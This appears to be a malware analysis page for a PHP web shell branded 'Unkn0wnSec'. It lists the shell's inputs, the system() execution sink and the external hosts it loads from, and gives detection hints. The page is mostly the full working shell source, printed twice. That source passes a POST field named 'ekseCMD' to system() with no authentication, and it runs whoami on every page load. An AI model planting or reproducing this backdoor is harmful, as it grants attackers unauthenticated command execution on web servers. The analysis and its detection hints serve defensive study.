PHP Malware Analysis


Tags

URLs (all referenced protocol-relative with "//" in the sample; the host is unknownsec.ftp.sh, not bare ftp.sh)
unknownsec.ftp.sh/main/style-fm.css
unknownsec.ftp.sh/typed/typed.js
code.jquery.com/jquery-1.6.2.js
Title
unkn0wnsec@cmd:#~ shell
Execution
system() — runs $_POST['ekseCMD'] with " 2>&1" appended (unauthenticated remote command execution); a second system("whoami") runs on every plain page load
Input
$_GET['id'] (must equal "cmd" to reach the command handler)
$_POST['ekseCMD'] (the command to execute)

Deobfuscated code (the sample is not actually obfuscated; this listing is the original below, reformatted)

<?php

// Webshell command handler. When the request has ?id=cmd and a POST field
// "ekseCMD", the field's value is passed verbatim to system() and the output
// is written into the response. There is no authentication, no allow-list and
// no escaping anywhere in this file: anyone who can reach it gets command
// execution as the web-server account.
// Detection hints: query string "id=cmd", POST body field "ekseCMD",
// response body starting with "<b>Unkn0wnSec".
if ($_GET['id'] == 'cmd') {
    if (isset($_POST['ekseCMD'])) {
        $result = $_POST['ekseCMD'];
        // Echo the raw command back inside the fake prompt (unescaped HTML);
        // the page's JS injects this whole response into #result via .html().
        print "<b>Unkn0wnSec<cmd>@</cmd>cmd#:~</b> <cmd>{$result}</cmd><br>";
        // Arbitrary command execution; " 2>&1" folds stderr into the page output.
        system($_POST['ekseCMD'] . ' 2>&1');
    }
    // The command endpoint returns only the command output, never the HTML UI.
    exit;
}
?>
<!DOCTYPE html>
<html lang="en">
	<head>
		<meta charset="UTF-8">
		<meta name="viewport" content="width=device-width, initial-scale=1">
		<title>unkn0wnsec@cmd:#~ shell</title>
		<link rel="stylesheet" href="//unknownsec.ftp.sh/main/style-fm.css">
		<script src="//code.jquery.com/jquery-1.6.2.js"></script>
	</head>
<style>
.shell {
	max-width: 800px;
	border-radius: 5px;
	border: 1px solid rgba(255, 255, 255, 0.4);
	font-size: 10pt;
	display: flex;
	flex-direction: column;
	align-items: stretch;
}
.pre {
	height: 300px;
	overflow: auto;
	padding: 5px;
	white-space: pre-wrap;
	flex-grow: 1;
}
.nana p span.typed-text {
	font-weight: normal;
	color: #dd7732;
}
.nana p span.cursor {
	display: inline-block;
	background-color: #ccc;
	margin-left: 0.1rem;
	width: 2px;
	animation: blink 1s infinite;
}
.nana p span.cursor.typing {
	animation: none;
}
cmd {
	color: #dd7732;
}
@keyframes blink {
	0% {background-color: #ccc;}
	49% {background-color: #ccc;}
	50% {background-color: transparent;}
	99% {background-color: transparent;}
	100% {background-color: #ccc;}
}
</style>
<body class="bg-dark text-secondary">
<div class="container-fluid">
	<div class="py-3" id="main">
		<div class="box shadow bg-dark p-4 rounded-3">
		<div class="nana">
			<p>Comand#:~ <span class="typed-text"></span><span class="cursor">&nbsp;</span></p>
		</div>
			<form action="?id=cmd" id="comand">
				<div class="shell bg-dark">
					<pre class="pre text-light" id="result"><b>Unkn0wnSec<cmd>@</cmd>cmd#:~</b> <br><?php 
// Runs on every plain page load (no ?id=cmd needed): executes `whoami` and
// prints the web-server account name into the fake terminal. The second
// argument only receives the process exit status and is never read.
system("whoami", $result);
?></pre>
				</div>
				<div class="form-group input-group">
					<div class="input-group-text"><i class="bi bi-terminal"></i></div><input type="text" class="form-control" name="ekseCMD" id="cmd">
				</div>
			</form>
			<br>
			<div class="text-center">&copy; <?php 
// Footer copyright year; cosmetic only.
echo date('Y');
?> UnknownSec</div>
		</div>
	</div>
</div>
<script>
// Intercept the form submit so the page never navigates: the typed command is
// POSTed to the form's action ("?id=cmd") as field "ekseCMD" and the response
// is handed to result(). act, ex_cmd and ekse are assigned without var/let and
// therefore become globals on window.
$("#comand").submit(function(event) {
	event.preventDefault();
	act = $("#comand").attr("action");
	ex_cmd = $("#cmd").val();
	ekse = {ekseCMD:ex_cmd};
	$.post(act,ekse,result);
});
// Success callback: writes the server response (echoed command followed by the
// command's stdout/stderr) into the fake terminal as unescaped HTML.
function result(data,textStatus) {
	$("#result").html(data);
}
</script>
<script src="//unknownsec.ftp.sh/typed/typed.js"></script>
</body>
</html>


Original code

<?php
// Webshell command handler (unformatted original). With ?id=cmd and a POST
// field "ekseCMD", the field's value goes straight to system() and the output
// is returned as the response body. No authentication, allow-list or escaping
// exists anywhere in the file.
// Detection hints: query string "id=cmd", POST field "ekseCMD", response
// body starting with "<b>Unkn0wnSec".
if($_GET['id'] == 'cmd') {
if(isset($_POST['ekseCMD'])) {
	$result = $_POST['ekseCMD'];
		// Echo the raw command back inside the fake prompt (unescaped HTML).
		print "<b>Unkn0wnSec<cmd>@</cmd>cmd#:~</b> <cmd>$result</cmd><br>";
		// Arbitrary command execution; " 2>&1" folds stderr into the output.
		system($_POST['ekseCMD'].' 2>&1');
	}
// Only the command output is returned on this path, never the HTML UI.
exit;
}
?>
<!DOCTYPE html>
<html lang="en">
	<head>
		<meta charset="UTF-8">
		<meta name="viewport" content="width=device-width, initial-scale=1">
		<title>unkn0wnsec@cmd:#~ shell</title>
		<link rel="stylesheet" href="//unknownsec.ftp.sh/main/style-fm.css">
		<script src="//code.jquery.com/jquery-1.6.2.js"></script>
	</head>
<style>
.shell {
	max-width: 800px;
	border-radius: 5px;
	border: 1px solid rgba(255, 255, 255, 0.4);
	font-size: 10pt;
	display: flex;
	flex-direction: column;
	align-items: stretch;
}
.pre {
	height: 300px;
	overflow: auto;
	padding: 5px;
	white-space: pre-wrap;
	flex-grow: 1;
}
.nana p span.typed-text {
	font-weight: normal;
	color: #dd7732;
}
.nana p span.cursor {
	display: inline-block;
	background-color: #ccc;
	margin-left: 0.1rem;
	width: 2px;
	animation: blink 1s infinite;
}
.nana p span.cursor.typing {
	animation: none;
}
cmd {
	color: #dd7732;
}
@keyframes blink {
	0% {background-color: #ccc;}
	49% {background-color: #ccc;}
	50% {background-color: transparent;}
	99% {background-color: transparent;}
	100% {background-color: #ccc;}
}
</style>
<body class="bg-dark text-secondary">
<div class="container-fluid">
	<div class="py-3" id="main">
		<div class="box shadow bg-dark p-4 rounded-3">
		<div class="nana">
			<p>Comand#:~ <span class="typed-text"></span><span class="cursor">&nbsp;</span></p>
		</div>
			<form action="?id=cmd" id="comand">
				<div class="shell bg-dark">
					<pre class="pre text-light" id="result"><b>Unkn0wnSec<cmd>@</cmd>cmd#:~</b> <br><?php /* runs on every plain page load: prints the web-server account name; $result only receives the exit status and is never read */ system("whoami", $result);?></pre>
				</div>
				<div class="form-group input-group">
					<div class="input-group-text"><i class="bi bi-terminal"></i></div><input type="text" class="form-control" name="ekseCMD" id="cmd">
				</div>
			</form>
			<br>
			<div class="text-center">&copy; <?=/* footer copyright year; cosmetic only */date('Y');?> UnknownSec</div>
		</div>
	</div>
</div>
<script>
// Intercept the form submit so the page never navigates: the typed command is
// POSTed to the form's action ("?id=cmd") as field "ekseCMD" and the response
// is handed to result(). act, ex_cmd and ekse are assigned without var/let and
// therefore become globals on window.
$("#comand").submit(function(event) {
	event.preventDefault();
	act = $("#comand").attr("action");
	ex_cmd = $("#cmd").val();
	ekse = {ekseCMD:ex_cmd};
	$.post(act,ekse,result);
});
// Success callback: writes the server response (echoed command followed by the
// command's stdout/stderr) into the fake terminal as unescaped HTML.
function result(data,textStatus) {
	$("#result").html(data);
}
</script>
<script src="//unknownsec.ftp.sh/typed/typed.js"></script>
</body>
</html>